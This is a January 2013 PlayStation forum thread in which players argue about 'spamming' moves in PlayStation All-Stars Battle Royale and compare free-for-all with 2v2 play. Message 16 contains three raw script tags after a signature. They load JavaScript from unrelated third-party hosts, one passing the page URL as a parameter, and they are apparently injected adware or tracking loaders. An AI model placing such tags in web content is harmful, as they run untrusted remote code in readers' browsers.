First Son
12 posts

Re: Starting to feel like...

Jan 12, 2013

well idk about a couple, like jak, he is pretty hard to get used to,(BTW im probably the best with him, but I dont spam) but I have seen people spam his rifle attack which I call, lack of skill, but thats just the game, you can spam with just about any character. I will say that the worst spam characters are toro, team kratos and nariko, evil coles projectiles, and Dante.

Message 11 of 17 (77 Views)
0 Likes
First Son
12 posts

Jan 12, 2013
sorry I did'nt mean to say Dante, but Dante's L3 overpowers way too much.
Message 12 of 17 (74 Views)
0 Likes
Hekseville Citizen
350 posts

Jan 12, 2013

wow i never came across a dante who even got there lvl 3 ... and making complaints about half the cast means yu dont really know how to play.. dont get mad at me but i really think yu suck now "spammers" are the easiest to counter

Jozai custom made signature photo jozaigoodcolesignature_zps1ca25a9d.gif
Message 13 of 17 (56 Views)
0 Likes
I Only Post Everything
1160 posts

Jan 12, 2013

Quick Match and Versus Mode is where the fun's at. I Once you reach to the higher belts in ranked, you start playing against tons of spammers. 

Needles Kane/Colonel Radec/Spike/Evil Cole/Sir Daniel Fortesque
Message 14 of 17 (50 Views)
0 Likes
I Only Post Everything
955 posts

Jan 12, 2013

Spamming is somewhat subjective.

If I choose to break into ground pound whenever someone is stupid enough to give me the opportunity is it spamming?

No of course its not, your stupid for letting it happen.

However when kratos stands in front of u and continually does >Square until u stop blocking... well thats probably spamming.

Calling people out on spamming a move is a losing battle, you shouldnt have let them hit you with it in the first place.

The only real solution is to make using a single move multiple times in a row give less AP each time, or slow down the speed of moves that people use alot.

Check out my [Moveset Creation Guide] ,my [PSASBR Wishlist]
...and my Movesets!

Message 15 of 17 (46 Views)
0 Likes
Gaming Beast
2167 posts

Jan 12, 2013

Catacyst wrote:

Krackatao wrote:

The problem with FFA is that there's very little reason to play anything but a poking game. Opportunities to combo uninterupted are few and far between. It's why FFA isn't taken all that seriously as a competitive game mode. Those that do usually don't have much experience in other fighting games.

In 2v2, dealing with projectiles is pretty easy if you're playing with a friend. Since you can coordinate better, you generally end up with your partner keeping tabs and harassing one opponent, giving you free range to approach the other. At this point, projectile tossing is a very limited stategy, and small, one-off AP gains simply won't compare to something like a full ground combo.

For characters like Kratos, his F.Square loses it's muster when he's forced into one-on-one scenarios. If you stay grounded and stymy block as you approach, opening him up using characters with seemingly more limited toolsets isn't just doable, but very doable.

In short, FFA is a joke because playing better means avoiding close-range exchanges entirely. Even if you're alone with an opponent on the other side of the map and you're landing a sick AP burst combo, there's a good chance someone on the other side of the map is doing the same.

In 2v2, having a trusted partner means you can convert good reads into huge meter gain without the fear of getting a random cake in the face.

I can't help but feel like people who consistently win at FFA's are still pretty skilled. Like you just explained, FFA requires that you manage a lot more enemies, so frequently winning is probably indicative of being able to beat most people.

Yes and no. It's a different type of skill. FFA rewards being evasive, so it does help in that sense, but trust me, I've seen a lot of trash talk from people who were higher ranked in FFA, and honestly most of the ones I've played can't do a 1v1 to save their lives.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 16 of 17 (35 Views)
0 Likes
Highlighted
Lombax Warrior
151 posts

Jan 13, 2013
Yeah what the other guy said, just get around the spams and if you can't or you're too lazy to figure out how then spam right back haha.
Its a game anyways and you're always gonna have one of each that will annoy you so just get over it.

Message 17 of 17 (22 Views)
0 Likes